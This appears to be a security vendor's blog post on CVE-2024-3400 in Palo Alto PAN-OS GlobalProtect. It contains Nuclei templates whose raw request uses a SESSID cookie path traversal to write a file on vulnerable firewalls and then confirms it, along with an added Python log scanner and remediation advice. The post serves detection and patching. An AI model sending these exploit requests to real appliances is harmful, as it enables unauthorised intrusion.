CVE
April 17, 2024

Gal Nagli

CEO

CVE-2024-3400 - Palo Alto Pan-OS Remote Code Execution

Last week Palo Alto publicly disclosed that various versions of their on-prem firewall appliance are vulnerable to CVE-2024-3400, a flaw that can lead to Remote Code Execution and carries a CVSS score of 10.0.

Detection and Exploitation

Shockwave was able to create detection templates using Nuclei's YAML rules and to successfully exploit the vulnerability by following public PoCs published on the internet, initially at this blog.

We have shared our detection template in our dedicated GitHub repository for Attack Surface CVE threats:

Detection Link

Proof of Concept

The PoC is divided into two parts. First, we create an arbitrary file on the server with the initial Nuclei template or the following HTTP request; it creates a "shockwave.txt" file under the publicly accessible global-protect/portal/images path.

id: CVE-2024-3400

info:
  name: GlobalProtect - OS Command Injection
  author: shockwave
  severity: critical
  reference:
    - https://labs.watchtowr.com/palo-alto-putting-the-protecc-in-globalprotect-CVE-2024-3400/
    - https://github.com/fkie-cad/nvd-json-data-feeds
    - https://github.com/k4nfr3/nmap-scripts
    - https://github.com/0x0d3ad/CVE-2024-3400
    - https://github.com/FoxyProxys/CVE-2024-3400
    - https://github.com/MrR0b0t19/CVE-2024-3400
    - https://nvd.nist.gov/vuln/detail/CVE-2024-3400
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cve-id: CVE-2024-3400
    cwe-id: CWE-77
    epss-score: 0.00371
    epss-percentile: 0.72356
    cpe: cpe:2.3:o:paloaltonetworks:pan-os:10.2.0:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    fofa-query: icon_hash="-631559155"
    product: pan-os
    vendor: paloaltonetworks
  # "oast" dropped from the tags: this template sends no out-of-band callback.
  tags: cve,cve2024,globalprotect,pan-os,rce,kev

http:
  - raw:
      - |
        POST /ssl-vpn/hipreport.esp HTTP/1.1
        Host: {{Hostname}}
        Cookie: SESSID=/../../../var/appweb/sslvpndocs/global-protect/portal/images/shockwave.txt;

    # The request contains no {{interactsh-url}}, so an interactsh_protocol
    # matcher can never fire and, combined with matchers-condition "and", the
    # template would never report. Match on the response body only; the second
    # step (the 403 check) is what confirms the file was actually written.
    matchers:
      - type: word
        part: body
        words:
          - "GlobalProtect Portal"

The second step is to query the created file: if we receive a 403 on that specific path, it confirms the file was created; otherwise, the appliance is patched.

id: CVE-2024-3400

info:
  name: GlobalProtect - OS Command Injection
  author: pdresearch,parthmalhotra
  severity: critical
  reference:
    - https://labs.watchtowr.com/palo-alto-putting-the-protecc-in-globalprotect-CVE-2024-3400/
    - https://github.com/fkie-cad/nvd-json-data-feeds
    - https://github.com/k4nfr3/nmap-scripts
    - https://github.com/0x0d3ad/CVE-2024-3400
    - https://github.com/FoxyProxys/CVE-2024-3400
    - https://github.com/MrR0b0t19/CVE-2024-3400
    - https://nvd.nist.gov/vuln/detail/CVE-2024-3400
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cve-id: CVE-2024-3400
    cwe-id: CWE-77
    epss-score: 0.00371
    epss-percentile: 0.72356
    cpe: cpe:2.3:o:paloaltonetworks:pan-os:10.2.0:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    fofa-query: icon_hash="-631559155"
    product: pan-os
    vendor: paloaltonetworks
  tags: cve,cve2024,globalprotect,pan-os,rce,oast,kev

http:
  - raw:
      - |
        GET /global-protect/portal/images/shockwave.txt HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 403
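
From the defender's side, the request shape used above (a SESSID cookie carrying a `../` traversal towards /var/appweb/sslvpndocs) is also what to hunt for in web-server access logs. The following Python script is an added example, not Shockwave's code and not part of the Nuclei templates: it parses constructed sample log lines (a simplified `METHOD PATH|Cookie: <header>` form, not the real PAN-OS log format), URL-decodes the SESSID value, and flags any value containing a traversal segment. The script goes slightly beyond the page's single request by also handling percent-encoded and double-encoded variants of the same value.

```python
"""Added example (not from the original post): flag requests whose SESSID
cookie carries a path-traversal sequence, the shape used by the CVE-2024-3400
PoC above. Input is constructed sample log text, not real PAN-OS logs."""
import re
from urllib.parse import unquote

# Constructed sample lines in a simplified "METHOD PATH|Cookie: <header>" form.
# Lines 1 and 2 carry traversal in SESSID (line 2 percent-encoded); 3 and 4 are benign.
SAMPLE_LOG = """\
POST /ssl-vpn/hipreport.esp|Cookie: SESSID=/../../../var/appweb/sslvpndocs/global-protect/portal/images/shockwave.txt;
POST /ssl-vpn/hipreport.esp|Cookie: SESSID=%2f%2e%2e%2f%2e%2e%2fvar%2fappweb%2fsslvpndocs%2fglobal-protect%2fportal%2fimages%2fx.txt;
POST /ssl-vpn/hipreport.esp|Cookie: SESSID=d41d8cd98f00b204e9800998ecf8427e;
GET /global-protect/portal/images/logo.png|Cookie: SESSID=abc123; lang=en
"""

LINE_RE = re.compile(r"^(?P<method>[A-Z]+) (?P<path>[^|\s]+)\|Cookie: (?P<cookie>.*)$")
# A ".." path segment bounded by a slash/backslash or by the start/end of the value.
TRAVERSAL_RE = re.compile(r"(?:^|[\\/])\.\.(?:[\\/]|$)")


def parse_cookies(header: str) -> dict:
    """Split a Cookie header into a name -> raw value mapping."""
    cookies = {}
    for part in header.split(";"):
        part = part.strip()
        if "=" not in part:
            continue
        name, _, value = part.partition("=")
        cookies[name.strip()] = value.strip()
    return cookies


def normalize(value: str, rounds: int = 3) -> str:
    """URL-decode until the value stops changing (bounded), so that encoded or
    double-encoded '..' is compared in its decoded form."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def is_suspicious_sessid(value: str) -> bool:
    """True when the (decoded) SESSID contains a '..' traversal segment."""
    return TRAVERSAL_RE.search(normalize(value)) is not None


def scan(log_text: str) -> list:
    """Return one finding per log line whose SESSID cookie looks like traversal.
    The request path is reported but not used as a filter: the cookie value is
    the signal, whichever endpoint it was sent to."""
    findings = []
    for lineno, line in enumerate(log_text.splitlines(), start=1):
        m = LINE_RE.match(line)
        if not m:
            continue  # unparseable line; a real pipeline would count these
        sessid = parse_cookies(m["cookie"]).get("SESSID")
        if sessid is not None and is_suspicious_sessid(sessid):
            findings.append({
                "line": lineno,
                "method": m["method"],
                "path": m["path"],
                "sessid": normalize(sessid),
            })
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"line {f['line']}: {f['method']} {f['path']} SESSID={f['sessid']}")
```

Decoding is repeated until the value stops changing so that a percent-encoded or double-encoded `..` does not slip past a literal string match; apply the same normalisation before matching in a SIEM or WAF rule, and treat any hit on a GlobalProtect host as a reason to run the patched-version check in the Remediation section.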

It will look like the following (screenshots of the 403 response on a vulnerable instance and of the response on a fixed instance):

Vulnerable Instance: [screenshot]

Fixed Instance: [screenshot]

Remediation

Update your Palo Alto firewalls to the latest version using the patches suggested at https://security.paloaltonetworks.com/CVE-2024-3400

References

- https://labs.watchtowr.com/palo-alto-putting-the-protecc-in-globalprotect-CVE-2024-3400/
- https://github.com/fkie-cad/nvd-json-data-feeds
- https://github.com/k4nfr3/nmap-scripts
- https://github.com/0x0d3ad/CVE-2024-3400
- https://github.com/FoxyProxys/CVE-2024-3400
- https://github.com/MrR0b0t19/CVE-2024-3400
- https://nvd.nist.gov/vuln/detail/CVE-2024-3400


Closing Words

As always, our customers are the first to know about emerging threats. As proof, we were also the first to report this issue to various Bug Bounty Programs and help more entities protect their Attack Surface; we alerted about this particular threat 1 week before a public PoC was available.

https://www.linkedin.com/feed/update/urn:li:activity:7184496382420910080/
